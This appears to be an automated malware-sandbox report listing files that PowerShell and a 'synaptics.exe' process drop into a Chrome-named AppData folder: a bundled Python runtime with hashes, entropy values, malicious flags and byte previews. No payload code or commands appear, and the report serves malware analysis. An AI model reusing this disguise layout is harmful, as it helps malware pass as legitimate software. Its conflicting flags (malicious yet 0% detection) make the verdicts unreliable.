                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29208
                                                                                                                                                                                                  Entropy (8bit):6.643623418348
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                                                                                                                                                                                                  MD5:BC20614744EBF4C2B8ACD28D1FE54174
                                                                                                                                                                                                  SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                                                                                                                                                                                                  SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                                                                                                                                                                                                  SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\libssl-1_1.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):552216
                                                                                                                                                                                                  Entropy (8bit):5.779566253639773
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:MaYPTKwDsuz9V/9SYeujF59CF5e3SnEEATLU2lvzS7u:nYPTRDD9ND58GqbATLU2lvzS7u
                                                                                                                                                                                                  MD5:8845FCF1AE2DE1018DAAAEA01D9BA2D5
                                                                                                                                                                                                  SHA1:DB67697EE052738E6F23CC1D29B261BEF1D423E5
                                                                                                                                                                                                  SHA-256:B7E16AF3EFF9AB0869CFE60C256394A70A867879B7F56544A724D6AC1CCFAB88
                                                                                                                                                                                                  SHA-512:2792FE94DD35B594514C4FAD091C9683EC47814335D046F776CD1F043C576533E99088949F1F1AE6814C16DBDDA430EC53B2D64621EA0C818CADB91EC5E3A788
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x.._x.._x.._qf._t.._7b.^z.._3f.^z.._7b.^s.._7b.^r.._7b.^z.._.b.^{.._x.._..._.b.^T.._.b.^y.._.ba_y.._.b.^y.._Richx.._........................PE..L......c...........!...".....4......."....... ......................................P.....@......................... =...N...........0..s............>.../...@...6...,..8............................+..@............................................text...-........................... ..`.rdata..*k... ...l..................@..@.data....;.......6...|..............@....idata..dA.......B..................@..@.00cfg....... ......................@..@.rsrc...s....0......................@..@.reloc..)>...@...@..................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\py.ico

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75809
                                                                                                                                                                                                  Entropy (8bit):5.969322217946821
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:+sNNRmOha6UEm3BL61Z4tXSZ6HTk1FaA87Gl6L:+2No6UtB+1eJ9Z
                                                                                                                                                                                                  MD5:B35F68A3086562C4D5453FAAD5A3474E
                                                                                                                                                                                                  SHA1:673904FF9B305A6600E47AD715289122EC0B046A
                                                                                                                                                                                                  SHA-256:150C470F9943B806B44312EFDEC85755F22F8D7D52B31F93A9AF3C43E8627381
                                                                                                                                                                                                  SHA-512:6EC80921942B3BD3C85EF24A2DE5454A34A3AD11A1BC69B601AEA7B873E318073C0B2D78C26685999F78EC64A86282C08C53AB8D77E41C661AE968EA52C08176
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...............7......@@......(....8..00...........N.. ..........m]...............f..........h....l........ .t/..Er..@@.... .(B......00.... ..%...... .... ............... .....1......... .h....#...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..{.$.}....w........X..V.....F..]..T..P.H().........P)..<....Y..%%...[B2....2."..\......tOwO..9=.>}^=.5s.....==gz......;..;.T.x..0.3.x.....,.l..f.a..0......`..0.....a&.6..3...`......L0l..f.a..0......`..0.....a&.6..3........_.ro...Y:>.T...V...0c.......3v..X8..0c...56.....f,.t:..,.l....#......k8...l....G..1.u.6..n....5.......w.{...N..ND.\'P.......j...1.!.u+n..v|.._... ..>.....p.....}.v.y.h6...N...%`....[.l....F`.a.....og#....`..6.....f.`#.p..`..6.....fla#0...0c....q.m.9..{......3.\v.e....>}......."...p..w8E.l....`V..........H..l....e.]..~..Nm'....`V$.v..G?.Q...l...0+.6.v..0+.6.f..0+.6.z..0...].........q...O..`..L..w.v6......#....(...a..L.l....`&.6.)+~Y.........aY.{.r?..{.n.....{..F...o\QK.s..L47.p

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\pyc.ico

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):78396
                                                                                                                                                                                                  Entropy (8bit):6.10453452748711
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:WNXYu6xYBxqjlETx2UjHe20dH397tiKZoZa1ABtc8Yg2zR51ZV2vL2inK/fR1:sayx2lETxN+HTo8+bil1ZqdKX
                                                                                                                                                                                                  MD5:B1C9980131A3F20E344AA3AA2C8DEA49
                                                                                                                                                                                                  SHA1:0FE02F0ED5E56BBE7E4E98B1DCA061ED17FBF5C7
                                                                                                                                                                                                  SHA-256:FDA28A734788A3F175CB6AED4DAEB5F05F0E49F6A272CCD2051BA337F7B3B42F
                                                                                                                                                                                                  SHA-512:84CA107ACE44FA1964C6C1EA93FC767BDE88363339FC426A3D660DA53C84BADE14F1FAE99C494483BF2B5312938D84B0C1733C85E82592B8FFE8A28F76186A3A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:..............r?......@@......(...8@..00..........`V.. ...........e...............m..........h...xt........ ..1...y..@@.... .(B.....00.... ..%...... .... ............... .....L$........ .h....-...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y..W}..-.^....n.v.lK..@.../.,....`...s0g.@.0.d...8.@B&..9.'.@L....NX-..-.8v[.. ./-....zU..[..[.....w?...zU...[.-......=..#.h4..1./..h....4..F+......@..`...h:...4..F+......@..`...h:...4..F+......@..`...h:...4..F+.....O......x.9..:...t..lB{...B+..E+.M.....j%0Ah..i;,........m.....@.hO`.h..i{.'0v...=.ei%0F.. .C..M.+..<....w..d..~g&.j.*.y.uQ.T`Y..:....w.:.......y.t.BH.w.}.....v..#X.x1.....$0..F....8..<J.R.z8..Z.h....&...4m..'P.V3]..@6...........J ...4m.V...V...D+..A+.M.r.....j% F+.M[s.....Z...}.{Z.....=L.dI..9sF{....4......V.2.'....f.=....@3.h...t%...f.q...L^....Z.hf%.......3g:V.h....h%..V..Y.V.j....z.......#.J@.V...A+.$Z.h:...A,\.0.......t.........@3&fz..4.p..c....w.......\c.].g.....o...n....m.6.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\pyd.ico

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83351
                                                                                                                                                                                                  Entropy (8bit):6.269678824341842
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:fVLhV30CuzZO5Wf/DGsea4SNum23KXVDTEhr:f1hV3Uz447lea4muXG1TEhr
                                                                                                                                                                                                  MD5:1A8230030D821CF8EA57CE03AAEAD737
                                                                                                                                                                                                  SHA1:12656788B1FBE4D2375ECC2989A4D9DA69CAA0D6
                                                                                                                                                                                                  SHA-256:C4EC1845A5724B2A83500F3BD940355E2FE26EFC6B4FE6C208365359A6130DA1
                                                                                                                                                                                                  SHA-512:AF6356DC67249E724AE30F65DDEFB4E53C6F2703DA32FD5F135598BBD6189BEE70950242F52985478DE99979D1271EEC9F4E2981A29A9BC02C673E9B668FD0C1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...............H......@@......(....I..00..........._.. ..........hn...............w..........h....}........ ..;..@...@@.... .(B../...00.... ..%..W... .... ......&........ ......7........ .h.../A...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y...u.....u..l3..+Ar...)B..-.c...Y....X.$[....r..c.;>I..>..(...X.m%..G... ..H.....F,..f....~.T..W.^U...Yz.}.S....5.|....S^z.%H$...7 .H..i.$.e.4...2F...d.#..D....@"Y.H. .,c...H.1..H$..i.$.e.4...2F...d.#..D....@"Y.H. .,c...........B.d~H....G>.,.},%d. i......H. i9../.R..&!....0.C..&!...%.F.9H. iY...=..HZ.i.f.4...G...i.:.8....-..9.m..y>.G.\...x...~......O."......0".#F@..$c...B>.l&M=...........qm?>.K..?...azz:.Zi..#...E...../..t:.{...$C..IK0.n...._FGGG....#...e.\7......@...@.Rl...../J#.$.....[6..'_.9.f ...%..@s..@..H`.H. ii.l.......5.._..W.....@.......D....F.B...@....@.d.F 9..H.....$.....@...u3>.S...vzz..........@.$yx..~.g...w..Y.F@...E..x...,i...F...G..p...,...=.....f......@.lx..'..~H...b....,+.~.I|.#?.t

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\pyexpat.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):170264
                                                                                                                                                                                                  Entropy (8bit):6.693484567356425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:M5QtHVOqzYcylPwZzS8JqTuo0BmSWjIuVBY/xux08YvVILLh8ptCuX5x+:M2tHjzYcyu+unESWXA/xaYvD0
                                                                                                                                                                                                  MD5:92C72753FA5C8EAA615B007F89CDB482
                                                                                                                                                                                                  SHA1:34238E31E0D963838FF551B184EAB3267767AD12
                                                                                                                                                                                                  SHA-256:EBBDE07AFB2BB356CD400E97D8AFB5ABBC121CC0CC90F99BEC9C3FA5CA60DE14
                                                                                                                                                                                                  SHA-512:A80BBA7095E7178591266E411414B3A6A2CBA09B79F330631AC07A72C6EB2AFD1C50D7346938ED337A911307B15660C17D14FACC7AFC6EFD9759BFBEC2121BD6
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i^C.-?-.-?-.-?-.$G..#?-..J,./?-..J(.!?-..J).'?-..J../?-..J,./?-.fG,..?-.-?,._?-..J%.)?-..J-.,?-..J..,?-..J/.,?-.Rich-?-.........PE..L...M.,d...........!......................................................................@..........................:..P...`:.......p...............j.../......( ...5..T............................5..@............................................text............................... ..`.rdata...U.......V..................@..@.data........P.......2..............@....rsrc........p.......>..............@..@.reloc..( ......."...H..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\python_lib.cat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):162444
                                                                                                                                                                                                  Entropy (8bit):6.899798696437328
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:t01xIh2ISDWCMiVQwmXWFRlbIMWa1PhWkRtjNsj2+1/L3kr7Sy5Pxy:t0HIcI7C/ZIWVbZhWijNsjxkrvxy
                                                                                                                                                                                                  MD5:830E831E1896D35A5E414D518AC05A2B
                                                                                                                                                                                                  SHA1:D43B639FA1D0614EE40A85483998ED7C4996AB19
                                                                                                                                                                                                  SHA-256:739B93F1ABFD7E6188F0C86172E526DAD72E29E0FC177E4B8C4E3686DD90AE9B
                                                                                                                                                                                                  SHA-512:81FD4E1E2D376262B9F0C235EA817ECD608FE3B734CA25715BA64E33D831A330DDE5D68C3F821C540B442727D3B008103E584E6CC91DACBA6F17C0D31A7CF4C8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:0..z...*.H.........zw0..zr...1.0...`.H.e......0..K...+.....7.....K.0..K.0...+.....7.....].GkN..D.n...]....230405005111Z0...+.....7.....0..K.0*......T...Q...w.Z...g.1.0...+.....7...1...0... ....%...%......*.].4i,`..(...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ....%...%......*.].4i,`..(...0*....T..|../..IT....Q.1.0...+.....7...1...0*.....'......s..%R=5..1.0...+.....7...1...0*.....K..`....T...#\.1.0...+.....7...1...0*.....2m..3.......N..D1.0...+.....7...1...0... .......V.C.........>..wf...O...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .......V.C.........>..wf...O...0*.....KG{6.8.o.<v.....1.0...+.....7...1...0*...7.d3t.[....Fh....!1.0...+.....7...1...0... .k.r.....r...K=.w.&.....mY+..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .k.r.....r...K=.w.&.....mY+..0... .l..x....h......=....'&.ZZGe.7.31i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .l..x...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\python_tools.cat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31213
                                                                                                                                                                                                  Entropy (8bit):7.250253600675095
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:e+Obmujt2xtYZtMPgs+03HQIYiSy1pCQAGy+Pxh8E9VF0NyOXz0:eE0tQYYPf5YiSyvny+PxWEUQ
                                                                                                                                                                                                  MD5:E33C9E857AD27ADBE33B26AB13890657
                                                                                                                                                                                                  SHA1:D70E576009A35D201399059DBE6DEAC35E1AC168
                                                                                                                                                                                                  SHA-256:EDE0345311D5D825BA03E10423CF51515B3F3962F1286E46E1E6198ADFEC67CF
                                                                                                                                                                                                  SHA-512:AC370602AC8E55E5B524AC5E961CC5185978AE8532A29F24B6F806E3355530C3F67127AC2F65FE4849AC8B354DE7D1102B8E11FB3C5457A5548B1125209FE913
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:0.y...*.H........y.0.y....1.0...`.H.e......0.K>..+.....7....K/0.K+0...+.....7.....1..4.&N....XE...230405005423Z0...+.....7.....0.J.0*......n)z;.....n7...1.0...+.....7...1...0... ..ok..m.e,W=:a.VS...<....v.L..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..ok..m.e,W=:a.VS...<....v.L..0... ..7]Y....M..u...8..([M.A...}...91i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..7]Y....M..u...8..([M.A...}...90*....[2j[...kSR.V....81.0...+.....7...1...0... ...F....(.jg.cc]..<.t.1..a.&c\..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ...F....(.jg.cc]..<.t.1..a.&c\..0... ..d...m..'...n.L!...>..S.sU.g.1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..d...m..'...n.L!...>..S.sU.g.0... ..?..."`...^.M..|...D.....@C....1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..?..."`...^.M..|...D.....@C....0*.....v.ow......6:.ZGU,1.0...+.....7...1...0... ..#|.!+.Hy

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\select.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27416
                                                                                                                                                                                                  Entropy (8bit):6.835600420682668
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:+WFXERsAnq2NWow4VILQGR5YiSyvLPxWEa0P+:+xqwWow4VILQGf7SyzPx+
                                                                                                                                                                                                  MD5:6EBA3E39E61C839818F502BD67BBD672
                                                                                                                                                                                                  SHA1:CD724D843CA57F6EDBBBE94B3C352769F70AED65
                                                                                                                                                                                                  SHA-256:C942F16C17687E988434813E50D2FB222C528D0E56CCF2D15B13104676F93FC9
                                                                                                                                                                                                  SHA-512:8614F4DBF7DF68D66BA611B31135EB35EF5C6D24E1C3F3EC4E8DF67BE75102DA991F26FEA76EF930B686A1ED08AD4A4C5F62CB2BEA4233B26D276FFD3C54FC31
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5$..qE{.qE{.qE{.x=..sE{.#0z.sE{.#0~.zE{.#0..{E{.#0x.sE{..0z.sE{.qEz.LE{.:=z.tE{..0s.pE{..0{.pE{..0..pE{..0y.pE{.RichqE{.........PE..L...H.,d...........!........."...............0......................................u%....@..........................:..L....;..x....`...............<.../...p......D6..T............................6..@............0...............................text............................... ..`.rdata.."....0......................@..@.data........P......................@....rsrc........`.......0..............@..@.reloc.......p.......:..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\sqlite3.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1196824
                                                                                                                                                                                                  Entropy (8bit):6.776326140308749
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:E6OOR2q+dGpg4XzLojJT5r6hKarVTgnEEUNTZOdEV8RpDq+m5:zR2L94Xo5Q5OEeEYDzm5
                                                                                                                                                                                                  MD5:C60F6C4051EB55350C6EEDF5A87016AA
                                                                                                                                                                                                  SHA1:DB1C31C12BE04A5785D7CA3B8EA91B290EE9D1D8
                                                                                                                                                                                                  SHA-256:376D80DB08CEC2C8873A4D5EBC7D83F50F26A43EBAA837020874C8586FD85975
                                                                                                                                                                                                  SHA-512:FCBDFC27A778B1084BE96B88CF438E0937ADB8BABC41B538892B76283232AA557CE46701A8F62AB2FDB208AB0933F0E473CBD6DAD59203DC7495F48EE289B2A3
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.............^....L.....L.....L.....L.....U.........................2..........Rich...................PE..L.....,d...........!................_........................................@.......7....@.........................`;..."...].........................../...........5..T........................... 6..@............................................text............................... ..`.rdata...Y.......Z..................@..@.data....'...p..."...Z..............@....rsrc................|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\unicodedata.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1114904
                                                                                                                                                                                                  Entropy (8bit):5.393522969186712
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:PAKqQCb5Pfhnzr0qlmL8klMmuZ63NGM7IRG5eeIDe6VZyrIBHdQLhfFE+tc9S:PAKsZV0mmduJMMREtIC6Vo4uLc9S
                                                                                                                                                                                                  MD5:73A25EF47977BFF82315023F7F8E9DB1
                                                                                                                                                                                                  SHA1:9BD7882C39A995EA4044FB5D562060C16AF9A023
                                                                                                                                                                                                  SHA-256:AC2966C1A1F1FBEE97666E0AAADE5AB960B445AF3BACC1650B83EA8B637F2F7A
                                                                                                                                                                                                  SHA-512:C6155957E37C7A690E815F78508CCDCE9036E2EFFE45A9B47EAAFBB8A091D661B808C1A2CC6C7B83B41752121B869A877C981EE346B790F3CF3900A3D6F0B198
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#..p..p..p...p..p..q..p..q...p..q..p..q..p..q..p..q..p..p...p..q..p..q..p..tp..p..q..pRich..p........................PE..L...K.,d...........!.....8...........=.......P.......................................X....@.............................X................................/..............T...........................P...@............P..,............................text...J7.......8.................. ..`.rdata...}...P...~...<..............@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\winsound.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27928
                                                                                                                                                                                                  Entropy (8bit):6.803210417146149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:8wPBcVsin9R+URILO7I5YiSyvCJPxWEau:8wP2L9R+URILO767SyuPxb
                                                                                                                                                                                                  MD5:49F55D492AD016A6F0D0183768F8C903
                                                                                                                                                                                                  SHA1:0001BFFA17EEF519406710FA18808047EF19B590
                                                                                                                                                                                                  SHA-256:865C296E84C03E277145DC8DEE6E14C2AC418371A8D227576682ED596708EED8
                                                                                                                                                                                                  SHA-512:B0B57AF43FF2A3498EDCEEFAE71E253B3D9AEF23086D2BB41779A8B370BBA2801CA0CF5EFDD998E4415CB2EA61AFDA028BD1781C2DBBC8D1C157425B12D861DE
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6o..W.[.W.[.W.[./.[.W.[.".Z.W.[.".Z.W.[.".Z.W.[.".Z.W.[)".Z.W.[./.Z.W.[.W.[.W.[)".Z.W.[)".Z.W.[)".[.W.[)".Z.W.[Rich.W.[........................PE..L...L.,d...........!.........(...............0......................................3.....@..........................<..P...`<.......`...............>.../...p..X....7..T............................7..@............0...............................text...T........................... ..`.rdata.......0......................@..@.data...p....P......................@....rsrc........`.......0..............@..@.reloc..X....p.......:..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__future__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5302
                                                                                                                                                                                                  Entropy (8bit):4.761272492188341
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:iO+uujd+ShBkhGL45k3XYgvSEMkQFne2b1HDG:D+uSkkEknNvSEMkTk1HDG
                                                                                                                                                                                                  MD5:903D790CEF59478A60829CC3F6978890
                                                                                                                                                                                                  SHA1:3D7A098629D4217D34097FAF3DEE431A9A93B5C9
                                                                                                                                                                                                  SHA-256:70A3FB890DE3673DA0118F401F54E5C6B22639F45CDA7834F638EC3198DDACF7
                                                                                                                                                                                                  SHA-512:CD09FF62092C460B745FC6241F3F6D79B81D0B22FB541210C0D510314FD6209768F058FF4F76666D5B11BB9A0DF48F3DA6859DEBAB477598B302E44A25059C95
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Record of phased-in incompatible language changes.....Each line is of the form:.... FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",".. CompilerFlag ")"....where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples..of the same form as sys.version_info:.... (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int.. PY_MINOR_VERSION, # the 1; an int.. PY_MICRO_VERSION, # the 0; an int.. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string.. PY_RELEASE_SERIAL # the 3; an int.. )....OptionalRelease records the first release in which.... from __future__ import FeatureName....was accepted.....In the case of MandatoryReleases that have not yet occurred,..MandatoryRelease predicts the release in which the feature will become part..of the language.....Else MandatoryRelease records when the feature became part of the language;..in releases at or after that, modules no longer need.... from __futur

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__phello__.foo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):65
                                                                                                                                                                                                  Entropy (8bit):4.094714259436315
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbFQZhHFSbWQRSLABKCW5:SbFsBwbWEQYKx
                                                                                                                                                                                                  MD5:21452BCD01B4FA606D021E2A35A41918
                                                                                                                                                                                                  SHA1:63D058B0E42269750CE9FD4CA5049C57F6E26CAA
                                                                                                                                                                                                  SHA-256:AB3048BB63BB222868B04BED809A534986466828A6983C2686CE048C4F198D18
                                                                                                                                                                                                  SHA-512:F97089BB79A2E26A7D405BDA1B34C5966C55CCF1005CF88A627DD10625F526F530A74CC4A14A19DD75E6FD538796BB9380BE9D96AFFED75A8D77552380548FAF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file exists as a helper for the test.test_frozen module...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\_collections_abc.cpython-310.pyc.9633312

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32957
                                                                                                                                                                                                  Entropy (8bit):5.035245593394707
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZpDG8l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:rfl+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                                  MD5:6763F226CDDD531E543E644ACDF5AE18
                                                                                                                                                                                                  SHA1:87F6B7361FED314C458EE2F76EA8D235E6EC3C44
                                                                                                                                                                                                  SHA-256:2F6E1B01188CE9808A23135B42DFAB56C8622DE2C90479C1F046580751F932F6
                                                                                                                                                                                                  SHA-512:5D8668EE4F09E879049A6726F88B25DBBBFBA8E990202646E9DF5102D256D0205622B10ED393BA5654B4AB3D6DC60AA5FFAB5DE9F0BD94ACAA395621BF56407D
                                                                                                                                                                                                  Malicious:false
